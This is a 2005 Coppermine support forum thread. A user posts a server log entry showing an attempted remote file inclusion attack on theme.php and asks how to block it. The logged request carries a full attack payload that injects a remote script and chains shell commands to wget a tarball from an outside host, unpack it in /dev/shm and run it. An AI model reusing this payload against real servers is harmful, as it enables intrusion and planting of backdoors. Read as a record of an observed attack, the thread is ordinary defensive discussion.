Advanced search  

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Pages: [1]   Go Down

Author Topic: Hackattemp on ../themes/default/theme.php  (Read 10588 times)

0 Members and 1 Guest are viewing this topic.

Mherb

  • Coppermine newbie
  • Offline Offline
  • Posts: 1
Hackattemp on ../themes/default/theme.php
« on: March 26, 2005, 09:15:20 pm »
Code: [Select]
202.95.145.102 - - [26/Mar/2005:18:02:28 +0100] "GET modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.geocities.com/hendra_juzt/inject.txt?&cmd=uname%20-a;id;cd%20/dev/shm;wget%20makassar.us/ary.tar.gz;tar%20zxvf%20ary.tar.gz;cd%20.psy;./config%20REMON%202222;./*beep*;./run HTTP/1.1" 200 12655 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

Even if I am not vulnerable in this way bec. wget and other commands are not allowed except for root, I wonder how I could fix coppermine to not allow this junk.

bye
mherb
Logged

Nibbler

  • Guest
Re: Hackattemp on ../themes/default/theme.php
« Reply #1 on: March 26, 2005, 09:20:35 pm »
That's a nuke related vulnerability, standalone coppermine isn't affected.
Logged
Pages: [1]   Go Up
« previous next »
 

Page created in 0.013 seconds with 18 queries.